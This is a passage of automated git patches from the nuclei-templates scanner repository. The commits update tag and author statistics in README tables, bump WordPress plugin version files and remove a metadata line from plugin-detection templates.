| | | | | | +| rsshub | 1 | | | | | | | | | +| centreon | 1 | | | | | | | | | +| toolkit | 1 | | | | | | | | | +| anonup | 1 | | | | | | | | | +| codewars | 1 | | | | | | | | | +| rijksmuseum | 1 | | | | | | | | | +| linktap | 1 | | | | | | | | | +| appweb | 1 | | | | | | | | | +| utility | 1 | | | | | | | | | +| uiuxdevsocial-mastodon-instance | 1 | | | | | | | | | +| ecosys | 1 | | | | | | | | | +| bodybuildingcom | 1 | | | | | | | | | +| tuxedo | 1 | | | | | | | | | +| rmc | 1 | | | | | | | | | +| moin | 1 | | | | | | | | | +| pricing-deals-for-woocommerce | 1 | | | | | | | | | +| lacie | 1 | | | | | | | | | +| gemfury | 1 | | | | | | | | | +| piekielni | 1 | | | | | | | | | +| plurk | 1 | | | | | | | | | +| binom | 1 | | | | | | | | | +| themefusion | 1 | | | | | | | | | +| pubsec | 1 | | | | | | | | | +| flowci | 1 | | | | | | | | | +| idemia | 1 | | | | | | | | | +| bravia | 1 | | | | | | | | | +| justforfans | 1 | | | | | | | | | +| commvault | 1 | | | | | | | | | +| intouch | 1 | | | | | | | | | +| teslamate | 1 | | | | | | | | | +| prexview | 1 | | | | | | | | | +| jinfornet | 1 | | | | | | | | | +| aceadmin | 1 | | | | | | | | | +| geniusocean | 1 | | | | | | | | | +| inkbunny | 1 | | | | | | | | | +| trackmanialadder | 1 | | | | | | | | | +| wms | 1 | | | | | | | | | diff --git a/TOP-10.md b/TOP-10.md index 01d2c94a5b..5234375429 100644 --- a/TOP-10.md +++ b/TOP-10.md @@ -1,12 +1,12 @@ | TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT | |-----------|-------|--------------|-------|----------------------|-------|----------|-------|------|-------| -| cve | 1882 | dhiyaneshdk | 867 | http | 5927 | info | 2894 | file | 123 | -| panel | 904 | dwisiswant0 | 794 | workflows | 190 | high | 1282 | dns | 18 | -| wordpress | 785 | daffainfo | 664 | file | 123 | medium | 1063 | | | -| exposure | 689 | pikpikcu | 353 | network | 96 | critical | 710 | | | -| wp-plugin | 676 | pdteam | 278 | ssl | 24 | low | 221 | | | -| osint | 652 | pussycat0x | 255 | dns | 18 | unknown | 27 | | | -| xss | 648 | geeknik | 221 | headless | 9 | | | | | -| tech | 612 | ricardomaia | 219 | TEMPLATES-STATS.json | 1 | | | | | -| edb | 597 | ritikchaddha | 215 | cves.json | 1 | | | | | -| lfi | 551 | 0x_akoko | 179 | contributors.json | 1 | | | | | +| cve | 1908 | dhiyaneshdk | 882 | http | 5970 | info | 2907 | file | 130 | +| panel | 909 | dwisiswant0 | 796 | workflows | 190 | high | 1298 | dns | 18 | +| wordpress | 787 | daffainfo | 664 | file | 130 | medium | 1076 | | | +| exposure | 692 | pikpikcu | 353 | network | 98 | critical | 717 | | | +| wp-plugin | 678 | pdteam | 280 | ssl | 24 | low | 224 | | | +| xss | 660 | pussycat0x | 258 | dns | 18 | unknown | 27 | | | +| osint | 652 | geeknik | 221 | headless | 9 | | | | | +| tech | 614 | ricardomaia | 220 | contributors.json | 1 | | | | | +| edb | 597 | ritikchaddha | 217 | cves.json | 1 | | | | | +| lfi | 557 | 0x_akoko | 179 | TEMPLATES-STATS.json | 1 | | | | | From 1cba3b27e113a62a9c73d371be5ef7a44ba5c246 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sun, 2 Jul 2023 17:58:31 +0000 Subject: [PATCH 285/609] Auto README Update [Sun Jul 2 17:58:30 UTC 2023] :robot: --- README.md | 22 +++++++++++----------- 1 file changed, 11 insertions(+), 11 deletions(-) diff --git a/README.md b/README.md index ff54d4f373..09c8b05381 100644 --- a/README.md +++ b/README.md @@ -42,18 +42,18 @@ An overview of the nuclei template project, including statistics on unique tags, | TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT | |-----------|-------|--------------|-------|----------------------|-------|----------|-------|------|-------| -| cve | 1882 | dhiyaneshdk | 867 | http | 5927 | info | 2894 | file | 123 | -| panel | 904 | dwisiswant0 | 794 | workflows | 190 | high | 1282 | dns | 18 | -| wordpress | 785 | daffainfo | 664 | file | 123 | medium | 1063 | | | -| exposure | 689 | pikpikcu | 353 | network | 96 | critical | 710 | | | -| wp-plugin | 676 | pdteam | 278 | ssl | 24 | low | 221 | | | -| osint | 652 | pussycat0x | 255 | dns | 18 | unknown | 27 | | | -| xss | 648 | geeknik | 221 | headless | 9 | | | | | -| tech | 612 | ricardomaia | 219 | TEMPLATES-STATS.json | 1 | | | | | -| edb | 597 | ritikchaddha | 215 | cves.json | 1 | | | | | -| lfi | 551 | 0x_akoko | 179 | contributors.json | 1 | | | | | +| cve | 1908 | dhiyaneshdk | 882 | http | 5970 | info | 2907 | file | 130 | +| panel | 909 | dwisiswant0 | 796 | workflows | 190 | high | 1298 | dns | 18 | +| wordpress | 787 | daffainfo | 664 | file | 130 | medium | 1076 | | | +| exposure | 692 | pikpikcu | 353 | network | 98 | critical | 717 | | | +| wp-plugin | 678 | pdteam | 280 | ssl | 24 | low | 224 | | | +| xss | 660 | pussycat0x | 258 | dns | 18 | unknown | 27 | | | +| osint | 652 | geeknik | 221 | headless | 9 | | | | | +| tech | 614 | ricardomaia | 220 | contributors.json | 1 | | | | | +| edb | 597 | ritikchaddha | 217 | cves.json | 1 | | | | | +| lfi | 557 | 0x_akoko | 179 | TEMPLATES-STATS.json | 1 | | | | | -**410 directories, 6626 files**. +**412 directories, 6679 files**. From f5266f18c72fb3c29c4c0d485120b9d126ee1603 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 3 Jul 2023 04:02:06 +0000 Subject: [PATCH 286/609] Auto WordPress Plugins Update [Mon Jul 3 04:02:06 UTC 2023] :robot: --- helpers/wordpress/plugins/redux-framework.txt | 2 +- helpers/wordpress/plugins/shortcodes-ultimate.txt | 2 +- http/technologies/wordpress/plugins/ad-inserter.yaml | 1 - http/technologies/wordpress/plugins/add-to-any.yaml | 1 - http/technologies/wordpress/plugins/admin-menu-editor.yaml | 1 - http/technologies/wordpress/plugins/advanced-custom-fields.yaml | 1 - http/technologies/wordpress/plugins/akismet.yaml | 1 - .../wordpress/plugins/all-404-redirect-to-homepage.yaml | 1 - http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml | 1 - .../technologies/wordpress/plugins/all-in-one-wp-migration.yaml | 1 - .../wordpress/plugins/all-in-one-wp-security-and-firewall.yaml | 1 - http/technologies/wordpress/plugins/amp.yaml | 1 - http/technologies/wordpress/plugins/antispam-bee.yaml | 1 - http/technologies/wordpress/plugins/astra-sites.yaml | 1 - http/technologies/wordpress/plugins/astra-widgets.yaml | 1 - http/technologies/wordpress/plugins/autoptimize.yaml | 1 - http/technologies/wordpress/plugins/backwpup.yaml | 1 - http/technologies/wordpress/plugins/better-search-replace.yaml | 1 - http/technologies/wordpress/plugins/better-wp-security.yaml | 1 - .../wordpress/plugins/black-studio-tinymce-widget.yaml | 1 - http/technologies/wordpress/plugins/breadcrumb-navxt.yaml | 1 - http/technologies/wordpress/plugins/breeze.yaml | 1 - http/technologies/wordpress/plugins/broken-link-checker.yaml | 1 - .../wordpress/plugins/child-theme-configurator.yaml | 1 - http/technologies/wordpress/plugins/classic-editor.yaml | 1 - http/technologies/wordpress/plugins/classic-widgets.yaml | 1 - .../wordpress/plugins/click-to-chat-for-whatsapp.yaml | 1 - http/technologies/wordpress/plugins/cloudflare.yaml | 1 - http/technologies/wordpress/plugins/cmb2.yaml | 1 - http/technologies/wordpress/plugins/coblocks.yaml | 1 - http/technologies/wordpress/plugins/code-snippets.yaml | 1 - http/technologies/wordpress/plugins/coming-soon.yaml | 1 - http/technologies/wordpress/plugins/complianz-gdpr.yaml | 1 - .../technologies/wordpress/plugins/contact-form-7-honeypot.yaml | 1 - http/technologies/wordpress/plugins/contact-form-7.yaml | 1 - http/technologies/wordpress/plugins/contact-form-cfdb7.yaml | 1 - http/technologies/wordpress/plugins/cookie-law-info.yaml | 1 - http/technologies/wordpress/plugins/cookie-notice.yaml | 1 - http/technologies/wordpress/plugins/creame-whatsapp-me.yaml | 1 - .../wordpress/plugins/creative-mail-by-constant-contact.yaml | 1 - http/technologies/wordpress/plugins/custom-css-js.yaml | 1 - http/technologies/wordpress/plugins/custom-fonts.yaml | 1 - http/technologies/wordpress/plugins/custom-post-type-ui.yaml | 1 - http/technologies/wordpress/plugins/disable-comments.yaml | 1 - http/technologies/wordpress/plugins/disable-gutenberg.yaml | 1 - http/technologies/wordpress/plugins/duplicate-page.yaml | 1 - http/technologies/wordpress/plugins/duplicate-post.yaml | 1 - http/technologies/wordpress/plugins/duplicator.yaml | 1 - .../wordpress/plugins/duracelltomi-google-tag-manager.yaml | 1 - http/technologies/wordpress/plugins/easy-fancybox.yaml | 1 - http/technologies/wordpress/plugins/easy-table-of-contents.yaml | 1 - http/technologies/wordpress/plugins/easy-wp-smtp.yaml | 1 - http/technologies/wordpress/plugins/elementor.yaml | 1 - http/technologies/wordpress/plugins/elementskit-lite.yaml | 1 - http/technologies/wordpress/plugins/enable-media-replace.yaml | 1 - http/technologies/wordpress/plugins/envato-elements.yaml | 1 - .../wordpress/plugins/essential-addons-for-elementor-lite.yaml | 1 - http/technologies/wordpress/plugins/ewww-image-optimizer.yaml | 1 - .../wordpress/plugins/facebook-for-woocommerce.yaml | 1 - http/technologies/wordpress/plugins/fast-indexing-api.yaml | 1 - .../wordpress/plugins/favicon-by-realfavicongenerator.yaml | 1 - http/technologies/wordpress/plugins/flamingo.yaml | 1 - http/technologies/wordpress/plugins/fluentform.yaml | 1 - http/technologies/wordpress/plugins/font-awesome.yaml | 1 - .../wordpress/plugins/force-regenerate-thumbnails.yaml | 1 - http/technologies/wordpress/plugins/formidable.yaml | 1 - http/technologies/wordpress/plugins/forminator.yaml | 1 - http/technologies/wordpress/plugins/ga-google-analytics.yaml | 1 - http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml | 1 - .../wordpress/plugins/google-analytics-dashboard-for-wp.yaml | 1 - .../wordpress/plugins/google-analytics-for-wordpress.yaml | 1 - .../technologies/wordpress/plugins/google-listings-and-ads.yaml | 1 - http/technologies/wordpress/plugins/google-site-kit.yaml | 1 - .../wordpress/plugins/google-sitemap-generator.yaml | 1 - http/technologies/wordpress/plugins/gtranslate.yaml | 1 - http/technologies/wordpress/plugins/gutenberg.yaml | 1 - http/technologies/wordpress/plugins/happy-elementor-addons.yaml | 1 - .../wordpress/plugins/header-and-footer-scripts.yaml | 1 - .../wordpress/plugins/header-footer-code-manager.yaml | 1 - .../technologies/wordpress/plugins/header-footer-elementor.yaml | 1 - http/technologies/wordpress/plugins/header-footer.yaml | 1 - http/technologies/wordpress/plugins/health-check.yaml | 1 - http/technologies/wordpress/plugins/hello-dolly.yaml | 1 - http/technologies/wordpress/plugins/host-webfonts-local.yaml | 1 - http/technologies/wordpress/plugins/imagify.yaml | 1 - http/technologies/wordpress/plugins/imsanity.yaml | 1 - .../wordpress/plugins/insert-headers-and-footers.yaml | 1 - http/technologies/wordpress/plugins/instagram-feed.yaml | 1 - .../wordpress/plugins/intuitive-custom-post-order.yaml | 1 - http/technologies/wordpress/plugins/iwp-client.yaml | 1 - http/technologies/wordpress/plugins/jetpack.yaml | 1 - http/technologies/wordpress/plugins/kadence-blocks.yaml | 1 - http/technologies/wordpress/plugins/kirki.yaml | 1 - http/technologies/wordpress/plugins/leadin.yaml | 1 - .../wordpress/plugins/limit-login-attempts-reloaded.yaml | 1 - http/technologies/wordpress/plugins/limit-login-attempts.yaml | 1 - http/technologies/wordpress/plugins/litespeed-cache.yaml | 1 - http/technologies/wordpress/plugins/loco-translate.yaml | 1 - http/technologies/wordpress/plugins/loginizer.yaml | 1 - http/technologies/wordpress/plugins/loginpress.yaml | 1 - .../wordpress/plugins/mailchimp-for-woocommerce.yaml | 1 - http/technologies/wordpress/plugins/mailchimp-for-wp.yaml | 1 - http/technologies/wordpress/plugins/mailpoet.yaml | 1 - http/technologies/wordpress/plugins/maintenance.yaml | 1 - http/technologies/wordpress/plugins/mainwp-child.yaml | 1 - http/technologies/wordpress/plugins/malcare-security.yaml | 1 - http/technologies/wordpress/plugins/megamenu.yaml | 1 - http/technologies/wordpress/plugins/members.yaml | 1 - http/technologies/wordpress/plugins/meta-box.yaml | 1 - http/technologies/wordpress/plugins/ml-slider.yaml | 1 - http/technologies/wordpress/plugins/newsletter.yaml | 1 - .../wordpress/plugins/nextend-facebook-connect.yaml | 1 - http/technologies/wordpress/plugins/nextgen-gallery.yaml | 1 - http/technologies/wordpress/plugins/ninja-forms.yaml | 1 - http/technologies/wordpress/plugins/ocean-extra.yaml | 1 - .../technologies/wordpress/plugins/official-facebook-pixel.yaml | 1 - http/technologies/wordpress/plugins/one-click-demo-import.yaml | 1 - http/technologies/wordpress/plugins/optinmonster.yaml | 1 - http/technologies/wordpress/plugins/otter-blocks.yaml | 1 - http/technologies/wordpress/plugins/password-protected.yaml | 1 - http/technologies/wordpress/plugins/pdf-embedder.yaml | 1 - http/technologies/wordpress/plugins/photo-gallery.yaml | 1 - http/technologies/wordpress/plugins/pixelyoursite.yaml | 1 - http/technologies/wordpress/plugins/polylang.yaml | 1 - http/technologies/wordpress/plugins/popup-builder.yaml | 1 - http/technologies/wordpress/plugins/popup-maker.yaml | 1 - http/technologies/wordpress/plugins/post-smtp.yaml | 1 - http/technologies/wordpress/plugins/post-types-order.yaml | 1 - .../wordpress/plugins/premium-addons-for-elementor.yaml | 1 - http/technologies/wordpress/plugins/pretty-link.yaml | 1 - http/technologies/wordpress/plugins/really-simple-captcha.yaml | 1 - http/technologies/wordpress/plugins/really-simple-ssl.yaml | 1 - http/technologies/wordpress/plugins/redirection.yaml | 1 - http/technologies/wordpress/plugins/redux-framework.yaml | 1 - http/technologies/wordpress/plugins/regenerate-thumbnails.yaml | 1 - http/technologies/wordpress/plugins/safe-svg.yaml | 1 - http/technologies/wordpress/plugins/seo-by-rank-math.yaml | 1 - http/technologies/wordpress/plugins/sg-cachepress.yaml | 1 - http/technologies/wordpress/plugins/sg-security.yaml | 1 - http/technologies/wordpress/plugins/shortcodes-ultimate.yaml | 1 - .../wordpress/plugins/shortpixel-image-optimiser.yaml | 1 - .../wordpress/plugins/simple-custom-post-order.yaml | 1 - http/technologies/wordpress/plugins/siteguard.yaml | 1 - http/technologies/wordpress/plugins/siteorigin-panels.yaml | 1 - http/technologies/wordpress/plugins/smart-slider-3.yaml | 1 - http/technologies/wordpress/plugins/so-widgets-bundle.yaml | 1 - .../wordpress/plugins/stops-core-theme-and-plugin-updates.yaml | 1 - http/technologies/wordpress/plugins/sucuri-scanner.yaml | 1 - http/technologies/wordpress/plugins/svg-support.yaml | 1 - http/technologies/wordpress/plugins/table-of-contents-plus.yaml | 1 - http/technologies/wordpress/plugins/tablepress.yaml | 1 - http/technologies/wordpress/plugins/taxonomy-terms-order.yaml | 1 - http/technologies/wordpress/plugins/the-events-calendar.yaml | 1 - http/technologies/wordpress/plugins/themeisle-companion.yaml | 1 - http/technologies/wordpress/plugins/tinymce-advanced.yaml | 1 - .../wordpress/plugins/translatepress-multilingual.yaml | 1 - .../wordpress/plugins/ultimate-addons-for-gutenberg.yaml | 1 - .../technologies/wordpress/plugins/under-construction-page.yaml | 1 - http/technologies/wordpress/plugins/updraftplus.yaml | 1 - http/technologies/wordpress/plugins/use-any-font.yaml | 1 - http/technologies/wordpress/plugins/user-role-editor.yaml | 1 - .../wordpress/plugins/velvet-blues-update-urls.yaml | 1 - http/technologies/wordpress/plugins/w3-total-cache.yaml | 1 - .../wordpress/plugins/webp-converter-for-media.yaml | 1 - http/technologies/wordpress/plugins/webp-express.yaml | 1 - .../wordpress/plugins/widget-importer-exporter.yaml | 1 - .../wordpress/plugins/woo-cart-abandonment-recovery.yaml | 1 - .../wordpress/plugins/woo-checkout-field-editor-pro.yaml | 1 - http/technologies/wordpress/plugins/woo-variation-swatches.yaml | 1 - .../plugins/woocommerce-gateway-paypal-express-checkout.yaml | 1 - .../wordpress/plugins/woocommerce-gateway-stripe.yaml | 1 - http/technologies/wordpress/plugins/woocommerce-payments.yaml | 1 - .../wordpress/plugins/woocommerce-paypal-payments.yaml | 1 - .../plugins/woocommerce-pdf-invoices-packing-slips.yaml | 1 - http/technologies/wordpress/plugins/woocommerce-services.yaml | 1 - http/technologies/wordpress/plugins/woocommerce.yaml | 1 - http/technologies/wordpress/plugins/wordfence.yaml | 1 - http/technologies/wordpress/plugins/wordpress-importer.yaml | 1 - http/technologies/wordpress/plugins/wordpress-seo.yaml | 1 - http/technologies/wordpress/plugins/worker.yaml | 1 - http/technologies/wordpress/plugins/wp-fastest-cache.yaml | 1 - http/technologies/wordpress/plugins/wp-file-manager.yaml | 1 - http/technologies/wordpress/plugins/wp-google-maps.yaml | 1 - http/technologies/wordpress/plugins/wp-mail-smtp.yaml | 1 - http/technologies/wordpress/plugins/wp-maintenance-mode.yaml | 1 - http/technologies/wordpress/plugins/wp-migrate-db.yaml | 1 - http/technologies/wordpress/plugins/wp-multibyte-patch.yaml | 1 - http/technologies/wordpress/plugins/wp-optimize.yaml | 1 - http/technologies/wordpress/plugins/wp-pagenavi.yaml | 1 - http/technologies/wordpress/plugins/wp-reset.yaml | 1 - http/technologies/wordpress/plugins/wp-rollback.yaml | 1 - http/technologies/wordpress/plugins/wp-sitemap-page.yaml | 1 - http/technologies/wordpress/plugins/wp-smushit.yaml | 1 - http/technologies/wordpress/plugins/wp-statistics.yaml | 1 - http/technologies/wordpress/plugins/wp-super-cache.yaml | 1 - http/technologies/wordpress/plugins/wp-user-avatar.yaml | 1 - http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml | 1 - http/technologies/wordpress/plugins/wpcf7-redirect.yaml | 1 - http/technologies/wordpress/plugins/wpforms-lite.yaml | 1 - http/technologies/wordpress/plugins/wps-hide-login.yaml | 1 - http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml | 1 - .../wordpress/plugins/yith-woocommerce-wishlist.yaml | 1 - 202 files changed, 2 insertions(+), 202 deletions(-) diff --git a/helpers/wordpress/plugins/redux-framework.txt b/helpers/wordpress/plugins/redux-framework.txt index f0f76fb693..f15ec04e09 100644 --- a/helpers/wordpress/plugins/redux-framework.txt +++ b/helpers/wordpress/plugins/redux-framework.txt @@ -1 +1 @@ -4.4.3 \ No newline at end of file +4.4.4 \ No newline at end of file diff --git a/helpers/wordpress/plugins/shortcodes-ultimate.txt b/helpers/wordpress/plugins/shortcodes-ultimate.txt index 22f097e28e..47c78569cc 100644 --- a/helpers/wordpress/plugins/shortcodes-ultimate.txt +++ b/helpers/wordpress/plugins/shortcodes-ultimate.txt @@ -1 +1 @@ -5.13.0 \ No newline at end of file +5.13.1 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ad-inserter.yaml b/http/technologies/wordpress/plugins/ad-inserter.yaml index ebb5ba1042..7cbd1855ae 100644 --- a/http/technologies/wordpress/plugins/ad-inserter.yaml +++ b/http/technologies/wordpress/plugins/ad-inserter.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/ad-inserter/ metadata: - max-request: 1 plugin_namespace: ad-inserter wpscan: https://wpscan.com/plugin/ad-inserter tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/add-to-any.yaml b/http/technologies/wordpress/plugins/add-to-any.yaml index fddfbf3118..8d579ff23d 100644 --- a/http/technologies/wordpress/plugins/add-to-any.yaml +++ b/http/technologies/wordpress/plugins/add-to-any.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/add-to-any/ metadata: - max-request: 1 plugin_namespace: add-to-any wpscan: https://wpscan.com/plugin/add-to-any tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/admin-menu-editor.yaml b/http/technologies/wordpress/plugins/admin-menu-editor.yaml index 7a6e8a76ec..4a6d8b7bbe 100644 --- a/http/technologies/wordpress/plugins/admin-menu-editor.yaml +++ b/http/technologies/wordpress/plugins/admin-menu-editor.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/admin-menu-editor/ metadata: - max-request: 1 plugin_namespace: admin-menu-editor wpscan: https://wpscan.com/plugin/admin-menu-editor tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/advanced-custom-fields.yaml b/http/technologies/wordpress/plugins/advanced-custom-fields.yaml index 940c0e614c..e4eb308d39 100644 --- a/http/technologies/wordpress/plugins/advanced-custom-fields.yaml +++ b/http/technologies/wordpress/plugins/advanced-custom-fields.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/advanced-custom-fields/ metadata: - max-request: 1 plugin_namespace: advanced-custom-fields wpscan: https://wpscan.com/plugin/advanced-custom-fields tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/akismet.yaml b/http/technologies/wordpress/plugins/akismet.yaml index 06cfd4950b..97f1d8c18f 100644 --- a/http/technologies/wordpress/plugins/akismet.yaml +++ b/http/technologies/wordpress/plugins/akismet.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/akismet/ metadata: - max-request: 1 plugin_namespace: akismet wpscan: https://wpscan.com/plugin/akismet tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml b/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml index 90aa5881fd..10f104f2c7 100644 --- a/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml +++ b/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/all-404-redirect-to-homepage/ metadata: - max-request: 1 plugin_namespace: all-404-redirect-to-homepage wpscan: https://wpscan.com/plugin/all-404-redirect-to-homepage tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml b/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml index 1bf337da6c..8addc28ded 100644 --- a/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/all-in-one-seo-pack/ metadata: - max-request: 1 plugin_namespace: all-in-one-seo-pack wpscan: https://wpscan.com/plugin/all-in-one-seo-pack tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml b/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml index 7cec152555..2e579621ac 100644 --- a/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/all-in-one-wp-migration/ metadata: - max-request: 1 plugin_namespace: all-in-one-wp-migration wpscan: https://wpscan.com/plugin/all-in-one-wp-migration tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml b/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml index 8a4b6133cd..41e297ffeb 100644 --- a/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/all-in-one-wp-security-and-firewall/ metadata: - max-request: 1 plugin_namespace: all-in-one-wp-security-and-firewall wpscan: https://wpscan.com/plugin/all-in-one-wp-security-and-firewall tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/amp.yaml b/http/technologies/wordpress/plugins/amp.yaml index cfa2e3d080..0dd8686ec3 100644 --- a/http/technologies/wordpress/plugins/amp.yaml +++ b/http/technologies/wordpress/plugins/amp.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/amp/ metadata: - max-request: 1 plugin_namespace: amp wpscan: https://wpscan.com/plugin/amp tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/antispam-bee.yaml b/http/technologies/wordpress/plugins/antispam-bee.yaml index a92d9bde4e..359671f3bd 100644 --- a/http/technologies/wordpress/plugins/antispam-bee.yaml +++ b/http/technologies/wordpress/plugins/antispam-bee.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/antispam-bee/ metadata: - max-request: 1 plugin_namespace: antispam-bee wpscan: https://wpscan.com/plugin/antispam-bee tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/astra-sites.yaml b/http/technologies/wordpress/plugins/astra-sites.yaml index 59144c7dd5..116e0c420a 100644 --- a/http/technologies/wordpress/plugins/astra-sites.yaml +++ b/http/technologies/wordpress/plugins/astra-sites.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/astra-sites/ metadata: - max-request: 1 plugin_namespace: astra-sites wpscan: https://wpscan.com/plugin/astra-sites tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/astra-widgets.yaml b/http/technologies/wordpress/plugins/astra-widgets.yaml index df06ba2f35..dc4703ef8d 100644 --- a/http/technologies/wordpress/plugins/astra-widgets.yaml +++ b/http/technologies/wordpress/plugins/astra-widgets.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/astra-widgets/ metadata: - max-request: 1 plugin_namespace: astra-widgets wpscan: https://wpscan.com/plugin/astra-widgets tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/autoptimize.yaml b/http/technologies/wordpress/plugins/autoptimize.yaml index 2a79d529cc..1426ac3ef2 100644 --- a/http/technologies/wordpress/plugins/autoptimize.yaml +++ b/http/technologies/wordpress/plugins/autoptimize.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/autoptimize/ metadata: - max-request: 1 plugin_namespace: autoptimize wpscan: https://wpscan.com/plugin/autoptimize tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/backwpup.yaml b/http/technologies/wordpress/plugins/backwpup.yaml index 556a113acc..78d1651ff4 100644 --- a/http/technologies/wordpress/plugins/backwpup.yaml +++ b/http/technologies/wordpress/plugins/backwpup.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/backwpup/ metadata: - max-request: 1 plugin_namespace: backwpup wpscan: https://wpscan.com/plugin/backwpup tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/better-search-replace.yaml b/http/technologies/wordpress/plugins/better-search-replace.yaml index 58d9a9d738..f7219b373d 100644 --- a/http/technologies/wordpress/plugins/better-search-replace.yaml +++ b/http/technologies/wordpress/plugins/better-search-replace.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/better-search-replace/ metadata: - max-request: 1 plugin_namespace: better-search-replace wpscan: https://wpscan.com/plugin/better-search-replace tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/better-wp-security.yaml b/http/technologies/wordpress/plugins/better-wp-security.yaml index 6c9c485079..f688a68f72 100644 --- a/http/technologies/wordpress/plugins/better-wp-security.yaml +++ b/http/technologies/wordpress/plugins/better-wp-security.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/better-wp-security/ metadata: - max-request: 1 plugin_namespace: better-wp-security wpscan: https://wpscan.com/plugin/better-wp-security tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml b/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml index 7631e87d78..00e95c4263 100644 --- a/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml +++ b/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/black-studio-tinymce-widget/ metadata: - max-request: 1 plugin_namespace: black-studio-tinymce-widget wpscan: https://wpscan.com/plugin/black-studio-tinymce-widget tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml b/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml index c7daa26ac6..212b2b13c4 100644 --- a/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml +++ b/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/breadcrumb-navxt/ metadata: - max-request: 1 plugin_namespace: breadcrumb-navxt wpscan: https://wpscan.com/plugin/breadcrumb-navxt tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/breeze.yaml b/http/technologies/wordpress/plugins/breeze.yaml index 68767e4dce..6318392c5c 100644 --- a/http/technologies/wordpress/plugins/breeze.yaml +++ b/http/technologies/wordpress/plugins/breeze.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/breeze/ metadata: - max-request: 1 plugin_namespace: breeze wpscan: https://wpscan.com/plugin/breeze tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/broken-link-checker.yaml b/http/technologies/wordpress/plugins/broken-link-checker.yaml index 073618936d..e1a2a186e0 100644 --- a/http/technologies/wordpress/plugins/broken-link-checker.yaml +++ b/http/technologies/wordpress/plugins/broken-link-checker.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/broken-link-checker/ metadata: - max-request: 1 plugin_namespace: broken-link-checker wpscan: 